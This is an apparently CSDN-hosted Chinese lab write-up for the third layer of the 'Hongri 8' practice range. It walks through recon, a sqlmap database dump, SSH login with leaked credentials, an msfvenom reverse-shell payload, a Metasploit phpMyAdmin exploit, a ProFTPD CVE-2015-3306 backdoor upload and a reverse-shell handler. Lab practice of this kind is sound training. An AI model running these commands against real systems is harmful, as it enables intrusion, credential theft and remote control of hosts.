红日8实战靶场(第三层总结)

第三层

172.16.10.130  +nat 192.168.75.135(这个环境可能是需要这个nat对外网的进行访问)
将172.16.10.130 都换成192.168.75.135

注意这里需要再添加一块网卡因为本身的漏洞利用尝试都成功不了,所以猜测可能是对外的一个转发机器

nmap -T4 -O -sV 172.16.10.130  发现了135,80,8080,3306等端口
172.16.10.130 (里面有网站)
dirsearch -u http://172.16.10.130  -e*   (

http://172.16.10.130/chat/
http://172.16.10.130/drupal/ 
http://172.16.10.130/phpmyadmin/
http://172.16.10.130/uploads/ 
扫描出来的
)

第一种
payroll_app.php  网站可以sqlmap跑一下数据库


 sqlmap -r 66.txt   -dbs
sqlmap -r 66.txt   -D "payroll"  -tables
sqlmap -r 66.txt   -D "payroll"  -T "users" --columns  --batch
sqlmap -r 66.txt   -D "payroll"  -T "users" -C first_name,last_name,password,password,username  --batch -dump    (用usernam跟password登入ssh)

ssh leia_organa@172.16.10.130   (账号leia_organa   密码 help_me_obiwan)
sudo  -i
find / -name "*net*"      (找那个关于payroll这个网站的信息)
cat /var/www/html/payroll_app.php  (发现了phpmyadmin  账号密码 root  sploitme)
(可以生成木马去上传跑)
msfvenom -p linux/x86/meterpreter/reverse_tcp lhost=192.168.75.131  lport=7777 -f elf > shell4.elf


第二种用刚刚看到的phpmyadmin账号密码
cd /usr/share/exploitdb/exploits/php/webapps   (可以查看phpmyadmin的漏洞)

search phpmyadmin 3.5.8
use 0
set rhosts 172.16.10.130
set password sploitme
run  

第三种(proftpd 1.3.5 命令读写和写入任意文件)
 cd exploit-CVE-2015-3306
python exploit.py --host 172.16.10.130 --port 21 --path "/var/www/html" 
http://172.16.10.130/backdoor.php?cmd=ifconfig(访问这个在cmd=后面加上ifconfig  等命令)

有这个backdoor.php文件


第四种 (这个可能不成功)
用这个http://172.16.10.130/uploads/ 上传
davtest -url http://172.16.10.130/uploads/  -uploadfile demon.php -uploadloc /Parent.php

得这样上传才可以其他的话内容会改变

use exploit/multi/handler

set payload php/meterpreter_reverse_tcp

set LHOST 192.168.75.135

set LPORT 6666
 

whatweb   http://192.168.75.135        (这两个都是扫描cms网站的)
cmseek -v -u http://192.168.137.171

评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值